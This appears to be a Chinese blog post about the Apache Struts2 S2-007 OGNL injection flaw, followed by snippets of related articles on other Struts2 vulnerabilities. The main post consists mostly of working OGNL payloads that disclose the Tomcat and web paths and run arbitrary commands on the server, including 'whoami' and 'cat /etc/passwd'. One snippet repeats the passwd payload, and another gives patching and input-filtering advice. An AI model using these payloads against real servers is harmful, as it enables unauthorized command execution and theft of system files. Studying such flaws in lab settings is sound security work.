S2-007 远程代码执行漏洞检测与利用

最新推荐文章于 2024-05-29 15:28:18 发布
原创 最新推荐文章于 2024-05-29 15:28:18 发布 · 1.4k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细解析了Struts2框架中由于OGNL表达式不当处理导致的注入漏洞,通过实例展示了如何利用该漏洞获取服务器路径、执行任意命令等攻击方式,对理解Struts2安全性和防御措施具有重要意义。

漏洞原理

如下age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞。

POC

a.获取tomcat执行路径:

%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

b、获取web路径

%{
#req=@org.apache.struts2.ServletActionContext@getRequest(),
#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),
#response.println(#req.getRealPath('/')),
#response.flush(),
#response.close()
}

c、执行任意命令:

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

执行任意命令时,如果所执行的命令需要组合,则将上述 payload 改为:

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

 

s2-001漏洞复现
m0_74859491的博客
03-13 669
开启docker进入vulhub —struts2—s2-001命令:cd vulhub/struts2/s2-001。执行了payload 里的语句 pwd , 回显出路径:/usr/local/tomcat。(Readme.md 英文说明, Readme.zh-cn.md 中文说明)先查看说明文件 命令:cat Readme.zh-cn.md。3、启用测试环境:docker-compose up -d。回显出路径:/usr/local/tomcat。请参阅《中华人民共和国网络安全法》
【vulhub】Struts2 S2-053 远程代码执行漏洞(CVE-2017-12611)
weixin_42884199的博客
12-07 585
前言 Struts2在使用Freemarker模板引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。 影响版本: Struts 2.0.1 - Struts 2.3.33, Struts 2.5 - Struts 2.5.10 一、启动靶机 docker-compose build docker-compose up -d 二、验证 payload: %{(223*223
S2-001 远程代码执行漏洞(漏洞复现)
米克源码的博客
01-07 267
1. 漏洞描述该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行漏洞版本:Struts 2.0.0 - Struts 2.0.8。
S2-001 漏洞复现
qq_36594628的博客
07-23 537
S2-001 一、漏洞原理 ​ 因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。 二、影响版本 ​ Struts 2.0.0 - 2.0.8 三、复现步骤 1、docker开启服务 2、访问<虚拟机IP>:8080 注:我的虚拟
漏洞学习---S2-001 远程代码执行漏洞
qq_37698661的博客
06-17 418
漏洞原理 ​ 由于用户提交表单数据并且验证失败时,后端会将用户先前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据当中,在真实的测试环境中,遇到注册或登录界面,存在提交数据失败情况,则后端会返回之前提交的数据信息,若后端使用%{value}对提交的数据执行了OGNL表达式解析,那么可以利用这点,直接构造payload进行远程代码执行操作. 漏洞环境 #使用vulhub进行漏洞演示 /vulhub-master/struts2/s2-001 docker-compose b
[struts2]s2-001
satasun的博客
12-09 342
[struts2]s2-001 环境搭建 Github buuctf poc 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 测试一下: exp 获取Tomcat执行路径: %{@java.lang.Syste
Strust2 远程代码执行漏洞[s2-005]
流水不争先,争的是滔滔不绝
05-29 904
漏洞影响版本【2.0.0 - 2.1.8.1】
【Vulfocus解题复现】Struts2 S2-048 远程命令执行漏洞 (CVE-2017-9791)
温氏效应
09-04 4212
漏洞介绍 名称:Struts2 S2-048 远程命令执行漏洞 CVE标识符:CVE-2017-9791 描述:Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型视图的数据交互。 攻击者构造恶意字段值(value)通过Struts2的struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。 解题过程 1、打开靶场环境 2、.
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
攻击者可以通过提交恶意的、可反序列化的对象,触发远程代码执行(RCE)。 接下来是s2-016漏洞(CVE-2016-1000031),这是2016年发现的一个高危漏洞,也OGNL有关。此漏洞在于Struts2的...
【漏洞复现】---- S2-001远程代码执行漏洞
qq_43168364的博客
09-08 487
一、简介 该漏洞是因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式 (Struts框架使用OGNL作为默认的表达式语言,作用是对数据进行访问) %{value}进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败,后端一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL表达式解析,所以可以直接构造Payload进行命令执行。 我们来了解以下Struts2中的validation机制。validation依靠valida
S2-001漏洞复现
baidu_38844729的博客
11-14 438
漏洞原理 因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 漏洞利用 切换到s2-001目录下,搭建启动测试环境 ...
Apache Struts2远程代码执行漏洞(S2-001)复现
oiadkt的博客
05-04 3496
Apache Struts2远程代码执行漏洞(S2-001)复现
S2-001 远程代码执行漏洞
EC_Carrot的博客
08-05 448
漏洞简介 漏洞复现 执行任意命令: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#
Struts2 远程代码执行漏洞S2-001分析
st3pby的博客
01-05 1472
首先来了解 OGNL 表达式,OGNL(Object Graphic Navigatino Language)的中文全称为“对象图导航语言”,是应用于Java中的一个开源的功能强大的表达式语言(Expression Language),它被集成在Struts2等框架中,通过简单一致的表达式语法,可以存取对象的任何属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。OGNL进行对象存取操作的API在Ognl.java文件中,分别是getValue、setValue两个方法。
Struts2 远程代码执行漏洞复现(S2-001)
Welcome To Myon'Blog !
03-14 1717
Struts2 是一个基于 MVC 设计模式的 Web 应用框架,作为控制器来建立模型视图的数据交互。此漏洞源于 Struts 2 框架中的一个标签处理功能:altSyntax。在开启时,支持对标签中的 OGNL 表达式进行解析并执行。Struts 2 的 “altSyntax” 功能允许将 OGNL 表达式插入到文本字符串中并递归处理,这允许恶意用户提交一个字符串,通常通过 HTML 文本字段,其中包含一个 OGNL 表达式(如 %{1+1}),如果表单验证失败,服务器将执行该表达式。
Apache Struts2远程代码执行漏洞(S2-001)
weixin_47493074的博客
09-29 745
Apache Struts2远程代码执行漏洞(S2-001)
Struts2 S2-061 远程命令执行漏洞
最新发布
08-05
### Struts2 S2-061 远程代码执行漏洞分析 Apache Struts2 是一个广泛使用的 Java Web 开发框架,其设计基于 MVC 架构,提供了强大的标签库和 OGNL 表达式解析功能。然而,在 2020 年 12 月 8 日,Apache Struts 官方披露了 S2-061 远程代码执行漏洞(CVE-2020-17530),该漏洞源于某些标签属性在特定情况下会进行 OGNL 表达式的二次解析,从而导致 OGNL 注入漏洞。攻击者可以构造恶意请求,远程执行任意命令,甚至控制服务器,造成严重安全风险 [^1]。 漏洞的核心在于 Struts2 对某些标签属性(如 `id`)的值进行两次 OGNL 表达式解析。当这些属性值中包含 `%{x}` 形式的内容,且 `x` 的值由用户控制时,攻击者可以注入恶意的 OGNL 表达式,例如 `%{payload}`,从而触发远程代码执行 [^3]。 S2-061 是对之前 S2-059 漏洞的修复绕过。S2-059 的补丁主要修复了沙盒绕过问题,但未完全阻止 OGNL 表达式的执行。S2-061 利用了 `org.apache.commons.collections.BeanMap` 类,该类存在于 `commons-collections-x.x.jar` 包中,而 Struts2 官方最小依赖包并未包含此库。因此,即使存在支持 OGNL 表达式注入的点,若未使用该依赖包,也无法成功利用 [^3]。 ### 漏洞影响范围 S2-061 漏洞影响使用 Apache Struts2 的多个版本,尤其是在使用某些标签属性时存在 OGNL 表达式二次解析的情况。攻击者可以构造特定的请求,利用该漏洞远程执行任意命令,进而控制服务器,造成数据泄露、系统瘫痪等严重后果 [^1]。 ### 修复方案 1. **升级 Struts2 版本**:官方在漏洞披露后发布了修复版本,建议用户尽快升级到 Struts 2.5.26 或更高版本。新版本中对 OGNL 表达式的解析机制进行了改进,避免了标签属性的二次解析问题 [^1]。 2. **避免使用用户输入构造 OGNL 表达式**:在开发过程中,应避免将用户输入直接拼接到 OGNL 表达式中,尤其是标签属性值。应使用安全的输入验证和输出编码机制,防止恶意输入被当作表达式解析 [^3]。 3. **移除不必要的依赖库**:由于 S2-061 的利用依赖于 `commons-collections` 包,因此建议检查项目依赖,移除不必要的 `commons-collections` 版本,以降低攻击面 [^3]。 4. **启用安全模式(沙盒)**:Struts2 提供了安全模式(沙盒)功能,可以在一定程度上限制 OGNL 表达式的执行。建议在配置文件中启用沙盒模式,并限制表达式的执行权限 [^4]。 5. **部署 Web 应用防火墙(WAF)**:为了进一步增强安全性,建议在前端部署 Web 应用防火墙(WAF),对请求进行过滤和检测,识别并拦截包含 OGNL 表达式的恶意请求 [^2]。 ### 示例代码:安全的输入处理 以下是一个简单的示例,展示如何避免将用户输入直接拼接到 OGNL 表达式中: ```java public class SafeInputAction { private String userInput; public String execute() { // 对用户输入进行过滤和转义 String safeInput = escapeUserInput(userInput); // 将安全处理后的输入用于业务逻辑 // ... return "success"; } private String escapeUserInput(String input) { // 实现输入过滤逻辑,如移除特殊字符 if (input == null) { return null; } return input.replaceAll("[^a-zA-Z0-9]", ""); } // Getter 和 Setter public String getUserInput() { return userInput; } public void setUserInput(String userInput) { this.userInput = userInput; } } ``` 在 JSP 页面中,确保标签属性不直接使用用户输入构造 OGNL 表达式: ```jsp <s:textfield name="userInput" label="请输入内容" /> ``` ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值